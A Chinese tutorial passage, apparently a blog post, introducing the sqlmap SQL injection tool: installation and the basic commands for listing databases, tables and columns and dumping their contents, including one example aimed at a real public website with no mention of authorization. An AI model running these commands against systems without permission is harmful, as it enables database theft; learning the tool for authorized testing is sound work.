四、sqlmap 万能注入工具

sqlmap是一个开源渗透测试工具,可自动检测和利用SQL注入。
使用之前需要先安装python环境,然后下载最新版的sqlmap,解压后将整个文件夹放在python安装目录下即可。
使用时先打开sqlmap文件夹,在空白处按下shift键同时右击,在弹出的的菜单中选择->在此处打开命令行,就可以开始使用了。

sqlmap上手非常简单,命令格式如下:
sqlmap -u xx.com
sqlmap -u xx.com --dbs
sqlmap -u xx.com -D xx --tables
sqlmap -u xx.com -D xx -T xxx --columns
sqlmap -u xx.com -D xx -T xxx -C xx,xx --dump

*** 注解:
-u 指定URL ,-D 指定数据库 ,-T 指定表 ,-C 指定字段
--dbs 爆数据库 , --tables 爆表 , --columns 爆字段 ,--dump 爆内容

使用时需要在前面加上python,例如:
python sqlmap -u http://www.baidu.com

以上是sqlmap最基本的使用方法,作为一个万能注入工具,自然还有许多更高级的用法,在这里就不再深入介绍了,已经入门的同学可以试着往更深处摸索~

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,541评论 2 22
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,387评论 0 5
  • sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    linkally阅读 11,897评论 1 40
  • sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    查无此人asdasd阅读 5,439评论 0 1
  • 破晓的微风有秘密要告诉你,别回去睡。你必须寻求你真正渴望的,别回去睡。人们在两个世界交界处的门口举步不定,圆形的门...
    念小娜阅读 3,616评论 0 1

友情链接更多精彩内容